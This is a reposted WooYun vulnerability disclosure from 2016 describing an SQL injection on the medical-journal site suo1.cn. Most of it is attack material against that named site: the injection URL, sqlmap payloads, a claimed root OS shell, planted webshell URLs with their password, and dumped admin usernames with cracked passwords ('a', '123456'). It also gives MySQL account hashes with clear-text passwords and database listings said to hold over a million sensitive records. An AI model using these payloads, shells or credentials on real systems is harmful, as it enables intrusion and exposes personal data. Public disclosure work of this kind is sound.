索医网某处漏洞(root权限/Getshell/提权服务器)涉及上百万敏感信息(包括简历/医院报告等等) admin 103574文章 87评论 2017年5月4日20:17:17评论498 views字数 253阅读0分50秒阅读模式 摘要2016-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-04-25: 厂商已经主动忽略漏洞,细节向公众公开 漏洞概要 关注数(7) 关注此漏洞 缺陷编号: WooYun-2016-183372 漏洞标题: 索医网某处漏洞(root权限/Getshell/提权服务器)涉及上百万敏感信息(包括简历/医院报告等等) 相关厂商: 索医网 漏洞作者: 路人甲 提交时间: 2016-03-11 17:13 公开时间: 2016-04-25 17:13 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 16 漏洞状态: 未联系到厂商或者厂商积极忽略 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 数据库账户权限过高 注射技巧 0人收藏 漏洞详情 披露状态: 2016-03-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-04-25: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 求上个首页。。。 详细说明: 索医网某处存在注入漏洞,直接是root 权限,直接sqlmap --os-shell 拿下shell 写入一句话,发现是超级管理员权限,直接可以添加用户,另外3389 是可以直接连接的,泄露10个医药网网站,上面存在大量网站信息、、、足足有上百万敏感信息、、、太多数据了 服务器就登陆上去了 点到为止、、、 注入点:http://www.suo1.cn/site/list.php?id=41 root权限 直接 --os-shell shell地址:http://www.suo1.cn/inc/tmpukzmf.php 一句话:http://www.suo1.cn/inc/1.php 密码:w D:/webphp/gl.suo1.cn/inc/> whoami windows-vdiq430/administrator code 区域 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=41) AND 5905=5905 AND (4726=4726 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=41) AND (SELECT 6578 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(6578=6578,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1492=1492 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=41) AND (SELECT * FROM (SELECT(SLEEP(5)))volC) AND (3818=3818 Type: UNION query Title: MySQL UNION query (NULL) - 30 columns Payload: id=41) UNION ALL SELECT CONCAT (0x7162786a71,0x475a426a424e59626656,0x7176627871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# --- [15:32:54] [INFO] the back-end DBMS is MySQL web server operating system: Windows web application technology: Apache 2.4.10, PHP 5.4.33 back-end DBMS: MySQL 5.0 available databases [15]: [*] cs_suo1_cn [*] hlyj_suo1_cn [*] hlyje_suo1_cn [*] information_schema [*] mysql [*] performance_schema [*] qkhl1_suo1_cn [*] suo1_site [*] sxhl_org [*] test [*] w_site [*] wanfang [*] xzhl_suo1_cn [*] zhuren [*] zxy_suo1_cn Database: suo1_site [17 tables] +--------------+ | ad_list | | hlyje_bw | | maga_columns | | maga_lm | | maga_nr | | maga_series | | s_user | | s_wsite | | wsite_about | | wsite_menu | | wsite_mx | | wsite_mx_kz | | wsite_news | | wsite_qk | | wsite_qknr | | wsite_temp | | wx_hongbao | +--------------+ Database: suo1_site +--------------+---------+ | Table | Entries | +--------------+---------+ | wsite_qknr | 230824 | | maga_nr | 46233 | | maga_columns | 6376 | | wsite_news | 1912 | | maga_series | 713 | | maga_lm | 176 | | wx_hongbao | 117 | | wsite_menu | 71 | | wsite_about | 30 | | wsite_qk | 30 | | s_user | 15 | | hlyje_bw | 13 | | wsite_temp | 12 | | wsite_mx_kz | 10 | | s_wsite | 7 | | wsite_mx | 2 | | ad_list | 1 | +--------------+---------+ Database: suo1_site Table: s_user [7 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | Id | int(11) | | jx_qx | varchar(255) | | qx | varchar(255) | | s_email | varchar(255) | | s_password | varchar(255) | | s_username | varchar(255) | | site_id | int(11) | +------------+--------------+ Database: suo1_site Table: s_user [15 entries] +------------+-------------------------------------------+ | s_username | s_password | +------------+-------------------------------------------+ | admin | 0cc175b9c0f1b6a831c399e269772661 (a) | | wyh | 0cc175b9c0f1b6a831c399e269772661 (a) | | hlyj | 0cc175b9c0f1b6a831c399e269772661 (a) | | zxy | 0cc175b9c0f1b6a831c399e269772661 (a) | | qkhl | 0cc175b9c0f1b6a831c399e269772661 (a) | | hlyje | 0cc175b9c0f1b6a831c399e269772661 (a) | | xzhl | 0cc175b9c0f1b6a831c399e269772661 (a) | | hlyjee | 0cc175b9c0f1b6a831c399e269772661 (a) | | admin1 | 0cc175b9c0f1b6a831c399e269772661 (a) | | admin2 | 0cc175b9c0f1b6a831c399e269772661 (a) | | admin3 | 0cc175b9c0f1b6a831c399e269772661 (a) | | changdayu | e10adc3949ba59abbe56e057f20f883e (123456) | | peifang | e10adc3949ba59abbe56e057f20f883e (123456) | | lixiaoyan | e10adc3949ba59abbe56e057f20f883e (123456) | | yujiayu | e10adc3949ba59abbe56e057f20f883e (123456) | +------------+-------------------------------------------+ database management system users password hashes: [*] root [2]: password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B root clear-text password: root password hash: *AECE71641589CFE947A37D283624CEF55A02C3FE [*] test [1]: password hash: *A3629E3861C4C6F5C852E0FB3DA01524963E218E [*] wf [1]: password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 clear-text password: 123456 [*] zhuren [1]: password hash: *FBD85F710780DBDB507D7EC4F64F9E6E58AB00FE 漏洞证明: 直接可以跑出各种数据,服务器上面一共有10个医药网站,数据量巨大啊、、、就不一一弄出来了。 code 区域 Database: cs_suo1_cn +-----------------+---------+ | Table | Entries | +-----------------+---------+ | g_log | 303067 | | g_sh | 155230 | | g_manuscript | 151804 | | g_file | 120787 | | s_user_authors | 109181 | | login_log | 82075 | | c_email_log | 57823 | | c_sms_log | 11079 | | g_bb_w_fb | 7882 | | g_jl | 5507 | | g_cw | 3722 | | s_getbook_xq | 3013 | | s_getbook | 2744 | | g_bb_d_user | 383 | | g_manuscript_cg | 303 | | g_bb_m_user | 252 | | g_bb_w | 151 | | s_zz_qj | 124 | | s_permission | 55 | | s_user | 55 | | s_zz_yjfx | 35 | | u_role_qh | 30 | | s_flow | 28 | | s_user_quickhf | 28 | | s_zz_lm | 20 | | s_zc | 17 | | s_role | 15 | | s_gjzt | 11 | | s_xl | 11 | | s_zz | 11 | | c_email | 10 | | c_sms | 9 | | g_jdlx | 6 | | s_yjfx | 6 | | s_zz_tgyj | 3 | | g_pdfjyg | 2 | | g_pdfjyg_cg | 2 | | g_bb_m | 1 | | g_magazine | 1 | | s_jjr | 1 | +-----------------+---------+ Database: hlyj_suo1_cn +-----------------+---------+ | Table | Entries | +-----------------+---------+ | g_log | 341829 | | g_sh | 163262 | | g_manuscript | 157563 | | login_log | 127961 | | g_file | 127167 | | s_user_authors | 112475 | | c_email_log | 70165 | | c_sms_log | 23955 | | g_bb_w_fb | 7882 | | g_jl | 6466 | | g_cw | 4311 | | s_getbook_xq | 3484 | | s_getbook | 3172 | | pay_zf_log | 1371 | | g_manuscript_cg | 404 | | g_bb_d_user | 383 | | g_bb_m_user | 252 | | g_bb_w | 151 | | s_zz_qj | 139 | | s_user | 98 | | s_permission | 58 | | s_zz_yjfx | 35 | | u_role_qh | 30 | | s_flow | 28 | | s_user_quickhf | 28 | | s_zz_lm | 20 | | s_zc | 17 | | s_role | 15 | | c_sms | 12 | | s_gjzt | 11 | | s_xl | 11 | | s_zz | 11 | | c_email | 10 | | pay_zf | 9 | | g_jdlx | 6 | | s_yjfx | 6 | | s_zz_tgyj | 3 | | g_pdfjyg | 2 | | g_pdfjyg_cg | 2 | | g_bb_m | 1 | | g_magazine | 1 | | s_jjr | 1 | +-----------------+---------+ Database: xzhl_suo1_cn +-------------------+---------+ | Table | Entries | +-------------------+---------+ | g_log | 4611 | | login_log | 3119 | | c_email_log | 1864 | | g_file | 827 | | g_manuscript | 805 | | s_user_authors | 788 | | g_sh | 783 | | c_sms_log | 466 | | s_user | 67 | | s_permission | 52 | | g_cw | 51 | | s_permission_bak1 | 48 | | s_getbook_xq | 44 | | s_getbook | 43 | | g_jl | 42 | | u_role_qh | 42 | | site_news_class | 33 | | s_flow | 31 | | s_flow_bak1 | 27 | | s_zz_lm | 23 | | s_zc | 17 | | s_role | 16 | | c_sms | 12 | | site_info | 12 | | s_gjzt | 11 | | s_xl | 11 | | s_zz | 11 | | c_email | 10 | | s_zz_yjfx | 10 | | s_zz_qj | 8 | | g_jdlx | 6 | | g_manuscript_cg | 6 | | s_yjfx | 6 | | s_user_quickhf | 3 | | s_zz_tgyj | 3 | | g_magazine | 1 | | site_user | 1 | +-------------------+---------+ 修复方案: 修复吧。。。 版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝 漏洞Rank:15 (WooYun评价) 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 2016-03-11 17:28 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入) 2 菊花好疼 艹 1# 回复此人 2016-05-01 11:06 | 无敌情痴 ( 普通白帽子 | Rank:203 漏洞数:61 | 没有站在安全界顶点的能力,但是也要不断的...) 0 ................ 2# 回复此人 点赞 https://cn-sec.com/archives/43883.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论